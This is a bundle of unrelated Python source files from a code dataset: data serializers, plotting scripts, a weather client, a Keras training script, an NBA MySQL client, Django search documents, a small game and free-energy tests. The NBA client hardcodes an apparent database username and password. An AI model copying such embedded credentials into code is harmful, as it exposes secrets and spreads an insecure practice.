\"\"\"\n deserailizer = deserializers.get(format_name.lower(), None)\n if deserailizer is None:\n raise UnsupportedFiletypeError(\n f\"The specified deserialization format {format_name} is not supported; \"\n f\"supported formats are {deserializers.keys()}\"\n )\n return 
deserailizer()\n\n\ndef get_format_name(file_name: str) -> str:\n \"\"\"\n Get the format name by splitting on the .\n\n Parameters:\n file_name: The name of the file from which we should work out the format.\n \"\"\"\n return file_name.split(\".\")[-1].lower()\n\n\ndef serialize(serializable: Dict, file_name: str) -> None:\n \"\"\"\n The main serialization method used to serialize objects.\n\n Parameters:\n serializable: The object to be serialized\n file_name: The name of the file the object will be serialized to.\n \"\"\"\n format_name = get_format_name(file_name)\n serializer = get_serializer(format_name)\n with open(file_name, \"w\" + serializer.data_type.value) as output:\n output.write(serializer.serialize(serializable))\n\n\ndef deserialize(file_name: str) -> Dict:\n \"\"\"\n The main method used to deserialize the objects from file.\n\n Parameters:\n file_name: The file from which the object should be extracted.\n \"\"\"\n format_name = get_format_name(file_name)\n deserializer = get_deserializer(format_name)\n if os.path.exists(file_name):\n with open(file_name, \"r\" + deserializer.data_type.value) as input_data:\n return deserializer.deserialize(input_data)\n else:\n raise RuntimeError(f\"The file {file_name} could not be found.\")\n\n\n# Register the json and yaml de/serializers\nregister_serializer(format_name=\"json\", serializer=JsonSerializer)\nregister_serializer(format_name=\"yaml\", serializer=YamlSerializer)\nregister_serializer(format_name=\"yml\", serializer=YamlSerializer)\nregister_deserializer(format_name=\"json\", deserializer=JsonDeSerializer)\nregister_deserializer(format_name=\"yaml\", deserializer=YamlDeSerializer)\nregister_deserializer(format_name=\"yml\", deserializer=YamlDeSerializer)\n","sub_path":"qcsubmit/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"228315066","text":"import os, sys\nimport pandas as pd, numpy as np\nfrom itertools import chain\nfrom glob import glob\nimport math, pdb\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nsys.path.append(\"./utils\")\nfrom performance_metrics import *\n\n\ndef sort_state(data,state):\n subset=data.filter(regex=state)\n subset=(subset.mean(axis=0)).sort_values(axis=0,ascending=False)\n return subset.index\n\ndef sort_models(data):\n data=(data.mean(axis=1)).sort_values(axis=0,ascending=True)\n return data.index\n\ndef create_heatmap(heatmap, states, x_labels, y_labels):\n cmap='viridis'\n font={'size':16}\n mpl.rc('font',**font)\n \n plt.figure(figsize=(20,10))\n plt.imshow(max(heatmap.max())-heatmap, cmap=cmap)\n plt.clim(min(heatmap.min()),max(heatmap.max()))\n plt.xticks(ticks=np.arange(heatmap.shape[1]), labels=(['']*len(x_labels)))\n plt.yticks(ticks=np.arange(heatmap.shape[0]), labels=np.char.replace(np.asarray(y_labels,dtype='str'),'_',' '))\n cbar=plt.colorbar(ticks=np.arange(min(heatmap.min())+(max(heatmap.max())-1),max(heatmap.max()),0.2),\n aspect=50, fraction=0.165, pad=0.02, orientation='horizontal')\n cbar.set_ticklabels(['1.0','0.8','0.6','0.4','0.2'])\n plt.tight_layout()\n ln=-0.5\n state_dict={'Arizona':'AZ', 'California':'CA', 'Florida':'FL',\n 'Wisconsin':'WI', 'Texas':'TX', 'New York':'NY',\n 'Connecticut':'CT', 'North Carolina':'NC', 'New Jersey':'NJ'}\n for state in states:\n nxt=(heatmap.filter(regex=state)).shape[1]\n ln+=nxt\n plt.text(ln-nxt/2-0.2,-0.6,state_dict[state])\n if ln<(heatmap.shape[1]-1):\n 
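# a white vertical rule separates one state's block of cities from the next; the guard above skips it after the final block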
plt.axvline(x=ln,linewidth=3,color='w')\n #plt.savefig(ddir+\"revised_combined_heatmap.png\",bbox_inches='tight', dpi=600)\n plt.show()\n \n \ndef combined_metric():\n ddir=\"./results/\"\n global_fit=pd.read_csv(ddir+\"Metrics/Location_scores.csv\")\n global_fit=global_fit[global_fit.Subset==\"Test\"]\n global_fit=global_fit[~global_fit.Model.str.contains(\"LR\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"'\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"2000\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"120\")]\n global_fit=global_fit[~global_fit.Model.str.contains(\"RAW\")]\n locs=np.unique(global_fit.Location)\n models=np.unique(global_fit.Model)\n ds=np.zeros((len(models),len(locs)))\n hs=np.zeros((len(models),len(locs)))\n for i in range(0,len(models)):\n if not \"LR\" in models[i]:\n thres_mo_off=pd.read_csv(ddir+\"Threshold_tables/Test/\"+models[i].lower()+\"_D_off_table.csv\")\n thres_mo_on=pd.read_csv(ddir+\"Threshold_tables/Test/\"+models[i].lower()+\"_D_on_table.csv\")\n for j in range(0,len(locs)):\n subset=global_fit[(global_fit.Model==models[i]) & (global_fit.Location==locs[j])]\n m1=(1-np.sqrt(subset.R2**2*subset.Pearson**2))\n m2=np.sqrt(subset.AUC_Diff**2+subset.RMSE**2)\n d=np.average(np.sqrt(m1**2+m2**2))\n ds[i,j]=d\n thres_off=thres_mo_off[(thres_mo_off.City==locs[j].split(',')[0]) & (thres_mo_off.State==locs[j].split(',')[-1])]\n thres_on=thres_mo_on[(thres_mo_on.City==locs[j].split(',')[0]) & (thres_mo_on.State==locs[j].split(',')[-1])]\n Z=(1+(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]].isna()*1).sum(axis=0)/len(thres_on))\n for col in [\"20%\",\"40%\",\"60%\",\"80%\"]:\n if thres_on[col].isna().any():\n thres_on[col].fillna(np.mean(np.absolute(thres_mo_on[col])), inplace=True)\n if thres_off[col].isna().any():\n thres_off[col].fillna(np.mean(np.absolute(thres_mo_off[col])), inplace=True)\n ht=1/sum(Z)*sum(Z*np.sqrt(np.mean(np.absolute(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]]))*\n np.std(np.absolute(thres_on[[\"20%\",\"40%\",\"60%\",\"80%\"]]))+\n np.mean(np.absolute(thres_off[[\"20%\",\"40%\",\"60%\",\"80%\"]]))*\n np.std(np.absolute(thres_off[[\"20%\",\"40%\",\"60%\",\"80%\"]]))))\n if math.isnan(ht):\n print(locs[j]+\",\"+models[i])\n #hs[i,j]=max(hs.max(),100)\n hs[i,j]=ht\n ds=ds/np.nanmax(ds)\n hs=hs/np.nanmax(hs)\n S=np.sqrt(ds**2+hs**2)\n S=pd.DataFrame(S,columns=locs,index=models)\n S.to_csv(ddir+\"combined_scores.csv\")\n return S\n\nif __name__ == '__main__':\n\n scores=combined_metric()\n states=[\"Wisconsin\",\"California\",\"Arizona\",\"Connecticut\",\"North Carolina\",\n \"New York\",\"New Jersey\",\"Texas\",\"Florida\"]\n loc_order=list()\n for state in states:\n order=sort_state(scores,state)\n loc_order.append(order)\n loc_order=list(chain(*loc_order))\n mo_order=sort_models(scores)\n scores=scores[loc_order].loc[mo_order]\n create_heatmap(scores, states, loc_order, mo_order)\n","sub_path":"figures/fig_8_combined_scores_heatmap.py","file_name":"fig_8_combined_scores_heatmap.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592750219","text":"import json\nimport sys\nimport urllib.request\nfrom collections import namedtuple\n\nWeather = namedtuple('Weather', ['location', 'temperature', 'air_pressure', 'humidity', 'state'])\n\n\ndef get_location_id(location_name):\n with urllib.request.urlopen(f'https://www.metaweather.com/api/location/search/?query={location_name}') as f:\n results = 
json.loads(f.read().decode('utf-8'))\n return results[0]['woeid']\n\n\ndef get_location_weather(location_id):\n with urllib.request.urlopen(f'https://www.metaweather.com/api/location/{location_id}') as f:\n result = json.loads(f.read().decode('utf-8'))\n return Weather(\n location=result['title'],\n temperature=result['consolidated_weather'][0]['the_temp'],\n air_pressure=result['consolidated_weather'][0]['air_pressure'],\n humidity=result['consolidated_weather'][0]['humidity'],\n state=result['consolidated_weather'][0]['weather_state_name']\n )\n\ndef main():\n while True:\n miasto = input('\\nPodaj miasto: ')\n if miasto == '': break\n try:\n location_id = get_location_id(miasto)\n weather = get_location_weather(location_id)\n print('Obiekt:', weather)\n print(f'Pogoda w {weather.location}:')\n print(f'- temperatura: {weather.temperature:.2f}°C')\n print(f'- ciśnienie: {weather.air_pressure} hPa')\n print(f'- wilgotność: {weather.humidity}%')\n print(f'- stan: {weather.state}')\n except Exception as e:\n print('Problem, prawdopodobnie nieznane miasto')\n print(e)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python3days/p08_json/pogoda4.py","file_name":"pogoda4.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104788692","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport pandas as pd\n\nimport sys\nimport os\n\nimport agatha as ag\nimport agatha.io as io\nfrom agatha.constants import DBConnections\nagl = ag.io.AGLDatabase()\n\n\napp = dash.Dash()\napp.css.config.serve_locally = True\napp.scripts.config.serve_locally = True\n\n\n\n#FrameLoadDate = '2017-12-12'\nsql = \"\"\"SELECT *\n FROM [Frame_Inbound].[HANA].[TBL_CalculatedTransferPriceMonthlyLoad]\n where FrameLoadDate = '2017-12-12' and year = 2017 and month >= 10\"\"\"\n\ndf = agl.simple_query(sql,DBConnections.FRAME_INBOUND)\ndf = df[df.PORTFOLIO.isin(['VIC_C', 'NSW_C', 'SA_C'])]\navailable_portfolios = df['PORTFOLIO'].unique()\n# options=[{'label': i, 'value': i} for i in available_portfolios]\n\n\napp.layout = html.Div([\n html.Div(\n dcc.Dropdown(\n id='Portfolio',\n options=[{'label': i, 'value': i} for i in available_portfolios],\n value = ['VIC_C'],\n clearable = True,\n multi = True\n ),\n style={'width': '28%', 'display': 'inline-block'}\n ),\n\n dcc.Graph(id = 'indicator-graphic'),\n\n dcc.Slider(\n id='year--slider',\n min=df['MONTH'].min(),\n max=df['MONTH'].max(),\n value=df['MONTH'].min(),\n step=None,\n marks={str(month): str(month) for month in df['MONTH'].unique()}\n ),\n\n html.Div(children=[\n html.H4(children='Business Customers Details'),\n html.Div([])\n ])\n\n])\n\n\n@app.callback(\n dash.dependencies.Output('indicator-graphic', 'figure'),\n [dash.dependencies.Input('Portfolio', 'value'),\n dash.dependencies.Input('year--slider', 'value')]\n)\ndef update_graph(selected_portfolios, year_value):\n filtered_df = df[(df.PORTFOLIO.isin(list(selected_portfolios))) & (df.MONTH == year_value)]\n\n traces = []\n\n for i in filtered_df.PORTFOLIO.unique():\n df_by_portfolio = filtered_df[filtered_df['PORTFOLIO'] == i]\n traces.append(go.Scatter(\n x = df_by_portfolio['PEAK_LOAD'],\n y = df_by_portfolio['PEAK_TRANSFER_PRICE'],\n text = df_by_portfolio['PORTFOLIO'],\n mode = 'markers',\n opacity=0.7,\n marker = {\n 'size': 15,\n 'opacity': 0.5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name = i\n ))\n\n return {\n 'data': 
traces,\n 'layout': go.Layout(\n xaxis = {'title': 'MWh per Month'},\n yaxis = {'title': 'Price $$$'},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 20},\n hovermode='closest'\n )\n }\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8052)\n","sub_path":"DashTest_DropDownButton.py","file_name":"DashTest_DropDownButton.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"347282592","text":"from keras.applications.vgg16 import VGG16\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense,GlobalAveragePooling2D\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\nimport numpy as np\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom pickle import dump\n\n\nif __name__ == \"__main__\":\n\n\n\n vggmodel = VGG16(weights='imagenet', include_top=False)\n\n trdata = ImageDataGenerator(rescale=1./255,preprocessing_function=preprocess_input,\n \trotation_range=180,\n \tzoom_range=0.15,\n \twidth_shift_range=0.2,\n \theight_shift_range=0.2,\n \tshear_range=0.15,\n \thorizontal_flip=True,\n vertical_flip = True,\n \tfill_mode=\"nearest\",\n brightness_range = [0.,1.])\n\n traindata = trdata.flow_from_directory(directory=\"datasets/train\",color_mode='rgb',batch_size= 32)\n # trdata.fit(traindata)\n\n tsdata = ImageDataGenerator(rescale=1./255,preprocessing_function=preprocess_input)\n\n testdata = tsdata.flow_from_directory(directory=\"datasets/val\",color_mode='rgb',batch_size= 32)\n\n\n num_class = np.unique(testdata.classes).shape[0]\n\n\n x=vggmodel.output\n x=GlobalAveragePooling2D()(x)\n x=Dense(1024,activation='relu')(x) #we add dense layers so that the model can learn more complex functions and classify for better results.\n x=Dense(1024,activation='relu')(x) #dense layer 2\n x=Dense(512,activation='relu')(x) #dense layer 3\n\n preds = Dense(num_class, activation=\"softmax\")(x)\n model_final = Model(inputs = vggmodel.input, outputs = preds)\n\n\n # for layer in model_final.layers[:19]:\n # layer.trainable=False\n for layer in model_final.layers[:]:\n layer.trainable=True\n\n model_final.compile(loss = \"categorical_crossentropy\",\n optimizer = optimizers.adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False),\n metrics=[\"accuracy\"])\n\n\n checkpoint = ModelCheckpoint(\"vgg16_transforms.h5\", monitor='val_accuracy', verbose=1,\n save_best_only=True, save_weights_only=False, mode='auto', period=1)\n\n early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=40, verbose=1, mode='auto')\n\n\n hist = model_final.fit_generator(generator= traindata, steps_per_epoch= 2060, epochs= 30,\n validation_data= testdata, validation_steps=0, callbacks=[checkpoint,early])\n\n\n with open('History_transform', 'wb') as handle: # saving the history of the model\n dump(hist.history, handle)\n","sub_path":"vgg_full_rotated/vgg_transformed_images.py","file_name":"vgg_transformed_images.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"461872887","text":"import mysql.connector\n\n\n\n\n\ntry:\n cnx = mysql.connector.connect(\n user='token_a2ef',\n host='127.0.0.1',\n database='jab0629_NBA',\n password = 'oTGVlYROiXumBDOk'\n )\n\n cursor = cnx.cursor()\n response = 1\n print (\"\")\n print (\"Welcome to NBA database 
client\")\n while (response > 0): \n print (\"\")\n print (\"Main Menu:\")\n print (\"Press 1 to see all teams\")\n print (\"Press 2 to see all players on a specific team\")\n print (\"Press 3 to see information about the tallest or heaviest players\")\n print (\"Press 4 to filter players by position \")\n print (\"Press 0 to exit\")\n\n\n completedItemNumber = 0 ##updates with each completion\n\n num = int(input(\"Please select an option: \")) ##reads choice for menu option\n \n\n if num==1: \n print (\"\") \n\n cursor.execute(\"\"\"SELECT team.team_name FROM team\"\"\") ##see all team names\n\n for (team_name) in cursor: ##print all team names\n print(f'{team_name}')\n \n elif num==2: #see all players on team read from stdin\n print (\"\")\n teamName = input(\"Please enter a team name to view: \") \n print(\"\")\n #select all team names of name : , display player and team name\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n WHERE team.team_name = %s\"\"\", (teamName,))\n\n for (fname,lname,team_name) in cursor:\n print(f'{fname} {lname}')\n\n\n elif num==3:\n print (\"\") #show name ht, wt, team name of heaviest or tallest players\n choose = input(\"Please enter either height or weight to see the three tallest or heaviest players: \")\n if choose=='height':\n\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, Player.heightInCm, Player.weightInLbs, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n ORDER BY heightInCm DESC limit 3;\"\"\")\n\n for (fname,lname,heightInCm, weightInLbs,team_name) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } stands tall at: {heightInCm} cm weighing: {weightInLbs} lbs')\n\n elif choose=='weight':\n\n cursor.execute(\"\"\"SELECT Player.fname, Player.lname, Player.heightInCm, Player.weightInLbs, team.team_name \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n ORDER BY weightInLbs DESC limit 3;\"\"\")\n for (fname,lname,heightInCm, weightInLbs,team_name) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } stands tall at: {heightInCm} cm weighing: {weightInLbs} lbs')\n \n elif num==4:\n print (\"\")\n \n choose = input(\"Please enter the position of the players you wish to see (F is Forward, G is Guard, C is Center: \")\n #selects player,team name, jersey no, and home state of player \n cursor.execute(\"\"\"SELECT Player.fname,Player.lname,team.team_name,Player.jersey_num, Player.home_state \n FROM team\n INNER JOIN Player on team.id = Player.team_id\n WHERE Player.position = %s\"\"\", (choose,))\n\n for (fname,lname,team_name,jersey_num,home_state) in cursor:\n print(\"\")\n print(f'{fname} {lname} of the {team_name } wearing jersey number {jersey_num} of {home_state}')\n\n\n\n\n elif num==0:\n response=0\n else:\n print (\"no such menu option\")\n\n\n\n #break\nexcept mysql.connector.Error as err:\n print(err)\nelse: \n # Invoked if no exception was thrown\n cnx.close()\n","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307462282","text":"from django_elasticsearch_dsl import DocType, Index, fields\r\nfrom website.profile import Profile, Founder, Job, Experience\r\nfrom website.models import MyUser\r\nfrom django.conf import settings\r\nfrom elasticsearch_dsl import analyzer, tokenizer\r\n\r\n# Profile search document\r\npeople_index_name = 
'people'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n people_index_name = settings.ELASTIC_PREFIX + '_' + people_index_name\r\n\r\n# Startup search document\r\nstartup_index_name = 'startup'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n startup_index_name = settings.ELASTIC_PREFIX + '_' + startup_index_name\r\n\r\n# Job search document\r\njob_index_name = 'job'\r\nif hasattr(settings, 'ELASTIC_PREFIX') and settings.ELASTIC_PREFIX:\r\n job_index_name = settings.ELASTIC_PREFIX + '_' + job_index_name\r\n\r\npeople = Index(people_index_name)\r\npeople.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\nstartup = Index(startup_index_name)\r\nstartup.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\njob = Index(job_index_name)\r\njob.settings(\r\n number_of_shards=1,\r\n number_of_replicas=0,\r\n)\r\n\r\nleave_default = analyzer(\r\n 'leave_default',\r\n tokenizer=\"standard\",\r\n filter=[\"standard\"]\r\n)\r\n\r\n@people.doc_type\r\nclass PeopleDocument(DocType):\r\n user = fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_individual': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'first_name': fields.StringField(),\r\n 'last_name': fields.StringField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n experience_set = fields.NestedField(properties={\r\n 'company': fields.StringField(),\r\n 'position': fields.StringField(),\r\n 'description': fields.TextField(),\r\n })\r\n positions = fields.StringField()\r\n image = fields.StringField(attr='image_url')\r\n # image_thumbnail = fields.StringField(attr='image_thumbnail_url')\r\n get_positions_display = fields.StringField(attr='get_positions_display')\r\n get_major_display = fields.StringField(attr='get_major_display')\r\n get_year_display = fields.StringField(attr='get_year_display')\r\n get_role_display = fields.StringField(attr='get_role_display')\r\n get_hours_week_display = fields.StringField(attr='get_hours_week_display')\r\n\r\n major = fields.StringField(attr='major', analyzer=leave_default)\r\n year = fields.StringField(attr='year', analyzer=leave_default)\r\n role = fields.StringField(attr='role', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Profile\r\n ignore_signals = False\r\n related_models = [MyUser, Experience]\r\n fields = [\r\n 'is_filled',\r\n 'hours_week',\r\n 'has_startup_exp',\r\n 'has_funding_exp',\r\n 'bio',\r\n 'skills',\r\n 'interests',\r\n 'courses',\r\n 'mentor'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'profile'):\r\n return related_instance.profile\r\n if isinstance(related_instance, Experience):\r\n return related_instance.profile\r\n\r\n\r\n@startup.doc_type\r\nclass StartupDocument(DocType):\r\n user = fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_founder': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'first_name': fields.StringField(),\r\n 'last_name': fields.StringField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n job_set = fields.NestedField(properties={\r\n 'title': fields.StringField(),\r\n 'description': fields.StringField(),\r\n 'level': fields.StringField(attr='get_level_display'),\r\n 'pay': fields.StringField(attr='get_pay_display')\r\n })\r\n logo = fields.StringField(attr='logo_url')\r\n # logo_thumbnail 
= fields.StringField(attr='logo_thumbnail_url')\r\n get_stage_display = fields.StringField(attr='get_stage_display')\r\n get_field_display = fields.StringField(attr='get_field_display')\r\n stage = fields.StringField(attr='stage', analyzer=leave_default)\r\n field = fields.StringField(attr='field', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Founder\r\n related_models = [MyUser, Job]\r\n fields = [\r\n 'startup_name',\r\n 'description',\r\n 'is_filled',\r\n 'employee_count'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'founder'):\r\n return related_instance.founder\r\n if isinstance(related_instance, Job):\r\n return related_instance.founder\r\n\r\n\r\n@job.doc_type\r\nclass JobDocument(DocType):\r\n founder = fields.ObjectField(properties={\r\n 'id': fields.IntegerField(),\r\n 'startup_name': fields.StringField(),\r\n 'description': fields.StringField(),\r\n 'logo': fields.StringField(attr='logo_url'),\r\n # 'logo_thumbnail': fields.StringField(attr='logo_thumbnail_url'),\r\n 'is_filled': fields.BooleanField(),\r\n 'field': fields.StringField(attr='field', analyzer=leave_default),\r\n 'user': fields.ObjectField(properties={\r\n 'is_active': fields.BooleanField(),\r\n 'is_account_disabled': fields.BooleanField(),\r\n 'last_activity': fields.DateField(attr='last_activity.date')\r\n })\r\n })\r\n get_pay_display = fields.StringField(attr='get_pay_display')\r\n get_level_display = fields.StringField(attr='get_level_display')\r\n\r\n pay = fields.StringField(attr='pay', analyzer=leave_default)\r\n level = fields.StringField(attr='level', analyzer=leave_default)\r\n\r\n class Meta:\r\n model = Job\r\n related_models = [Founder, MyUser]\r\n fields = [\r\n 'title',\r\n 'description'\r\n ]\r\n\r\n def get_instances_from_related(self, related_instance):\r\n if isinstance(related_instance, MyUser):\r\n if hasattr(related_instance, 'founder'):\r\n return related_instance.founder.job_set.all()\r\n if isinstance(related_instance, Founder):\r\n return related_instance.job_set.all()\r\n","sub_path":"search/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6443724","text":"import random\nimport time\n\ndef introduccion():\n print (\"Bienvenido ganador. Estamos en una tierra llena de dragones. Delante nuestro,\")\n time.sleep(2)\n print (\"se ven dos cuevas. En una cueva, el dragon es amigable\")\n time.sleep(2)\n print (\"y compartira el tesoro contigo. El otro dragon\")\n time.sleep(2)\n print (\"es codicioso y hambriento, y te va a comer.\")\n time.sleep(2)\n print (\"\")\n\ndef CambiarCueva():\n cueva = \"\"\n while cueva != \"1\" and cueva != \"2\":\n print (\"A que cueva quieres entrar? 1 o 2?\")\n cueva = input()\n \n return cueva\n\ndef cheqcueva(CambiarCueva):\n print (\"Te acercas a la Cueva...\")\n time.sleep(2)\n print (\"Esta oscuro y tenebroso...\")\n time.sleep(2)\n print (\"Un gran dragon salta delante tuyo, abre su boca y...\")\n print (\"\")\n time.sleep(2)\n \n FriendlyCueva = random.randint (1, 2)\n \n if CambiarCueva == str(FriendlyCueva):\n print (\"Te entrega el tesoro...\")\n else:\n print (\"El dragon te come de un bocado....\")\n \nEmpezarNuevo = (\"si\")\n\nwhile EmpezarNuevo == (\"s\") or EmpezarNuevo == (\"si\"):\n \n introduccion()\n \n NumCaverna = CambiarCueva()\n \n cheqcueva(NumCaverna)\n \n print (\"Quieres jugar de nuevo? 
(si o no)\")\n EmpezarNuevo = input()\n\n ","sub_path":"Historia/Dragon.py","file_name":"Dragon.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510980926","text":"\"\"\"\nGiven a string s consists of upper/lower-case alphabets and empty space characters ' ', return the length of last word in the string.\n\nIf the last word does not exist, return 0.\n\nNote: A word is defined as a character sequence consists of non-space characters only.\n\nExample:\n\nInput: \"Hello World\"\nOutput: 5\n\"\"\"\n\nclass Solution(object):\n def lengthOfLastWord(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n inword = False\n lastword = 0\n x = 0\n\n for i in range(0, len(s)):\n if s[i] != ' ':\n inword = True\n x += 1\n elif inword == True:\n lastword = x\n inword = False\n x = 0\n \n if x == 0:\n return lastword\n else:\n return x \n\n\n\ns = Solution()\nsol = s.lengthOfLastWord(\"abec \")\nif sol != None:\n print (\"The last word length is {}\".format(sol))","sub_path":"Easy/length_of_last_word.py","file_name":"length_of_last_word.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"474215433","text":"from jax.config import config; config.update(\"jax_enable_x64\", True)\nimport jax\nimport numpy as np\nimport jax.numpy as jnp\nfrom jax.scipy.special import logsumexp\nimport pymbar\nfrom fe import bar\nimport unittest\n\ndef finite_difference_bar(w, delta):\n fd_pymbar = np.zeros_like(w)\n for i in range(2):\n for j in range(len(w[0])):\n original = pymbar.BAR(w[0],w[1])[0]\n # central difference\n w[i][j] += 0.5*delta\n left_edge = pymbar.BAR(w[0],w[1])[0]\n w[i][j] -= delta\n right_edge = pymbar.BAR(w[0],w[1])[0]\n fd = (left_edge - right_edge)/delta\n fd_pymbar[i][j] = fd\n w[i][j] += 0.5*delta\n return fd_pymbar\n\ndef finite_difference_exp(w, delta):\n fd_exp = np.zeros_like(w)\n for i in range(2):\n for j in range(len(w[0])):\n original = bar.EXP(w)\n # central difference\n w[i][j] += 0.5*delta\n left_edge = bar.EXP(w)\n w[i][j] -= delta\n right_edge = bar.EXP(w)\n fd = (left_edge - right_edge)/delta\n fd_exp[i][j] = fd\n w[i][j] += 0.5*delta\n return fd_exp\n\nclass TestFreeEnergyDerivatives(unittest.TestCase):\n\n def test_bar_gradient(self):\n delta = 1e-6\n w = np.random.rand(2,50)\n np.testing.assert_allclose(\n finite_difference_bar(w, delta),\n bar.dG_dw(w),\n rtol=1e-6\n )\n\n def test_exp_gradient(self):\n delta = 1e-6\n w = np.random.rand(2,50)\n dEXP_dw = jax.grad(bar.EXP,argnums=(0,))\n np.testing.assert_allclose(\n finite_difference_exp(w, delta),\n dEXP_dw(w)[0],\n rtol=1e-6\n )\n\n","sub_path":"tests/test_bar.py","file_name":"test_bar.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574855687","text":"# coding: utf-8\n\nimport sys\n\nif sys.version_info < (3, 7):\n raise RuntimeError(\"A python version 3.7 or newer is required\")\n\nimport os\nimport time\nimport stat\nimport json\nimport shlex\nimport shutil\nimport hashlib\nimport zipfile\nimport argparse\nimport datetime\nimport tempfile\nimport platform\nimport subprocess\nfrom subprocess import check_call\nfrom contextlib import contextmanager\nfrom base64 import b64encode\nimport logging\n\nPY38 = sys.version_info >= (3, 8)\n\n################################################################################\n# 
Logging\n\nDEBUG2 = 9\nDEBUG3 = 8\n\nlog_handler = None\nlogger = logging.getLogger()\ncmd_logger = logging.getLogger('cmd')\n\n\ndef configure_logging(use_tf_stderr=False):\n global log_handler\n\n logging.addLevelName(DEBUG2, 'DEBUG2')\n logging.addLevelName(DEBUG3, 'DEBUG3')\n\n class LogFormatter(logging.Formatter):\n default_format = '%(message)s'\n formats = {\n 'root': default_format,\n 'build': default_format,\n 'cmd': '> %(message)s',\n '': '%(name)s: %(message)s'\n }\n\n def formatMessage(self, record):\n self._style._fmt = self.formats.get(record.name, self.formats[''])\n return super().formatMessage(record)\n\n tf_stderr_fd = 5\n log_stream = sys.stderr\n if use_tf_stderr:\n try:\n if os.isatty(tf_stderr_fd):\n log_stream = os.fdopen(tf_stderr_fd, mode='w')\n except OSError:\n pass\n\n log_handler = logging.StreamHandler(stream=log_stream)\n log_handler.setFormatter(LogFormatter())\n\n logger.addHandler(log_handler)\n logger.setLevel(logging.INFO)\n\n\n################################################################################\n# Backports\n\ndef shlex_join(split_command):\n \"\"\"Return a shell-escaped string from *split_command*.\"\"\"\n return ' '.join(shlex.quote(arg) for arg in split_command)\n\n\n################################################################################\n# Common functions\n\ndef abort(message):\n \"\"\"Exits with an error message.\"\"\"\n logger.error(message)\n sys.exit(1)\n\n\n@contextmanager\ndef cd(path, silent=False):\n \"\"\"Changes the working directory.\"\"\"\n cwd = os.getcwd()\n if not silent:\n cmd_logger.info('cd %s', shlex.quote(path))\n try:\n os.chdir(path)\n yield\n finally:\n os.chdir(cwd)\n\n\n@contextmanager\ndef tempdir():\n \"\"\"Creates a temporary directory and then deletes it afterwards.\"\"\"\n prefix = 'terraform-aws-lambda-'\n path = tempfile.mkdtemp(prefix=prefix)\n cmd_logger.info('mktemp -d %sXXXXXXXX # %s', prefix, shlex.quote(path))\n try:\n yield path\n finally:\n shutil.rmtree(path)\n\n\ndef 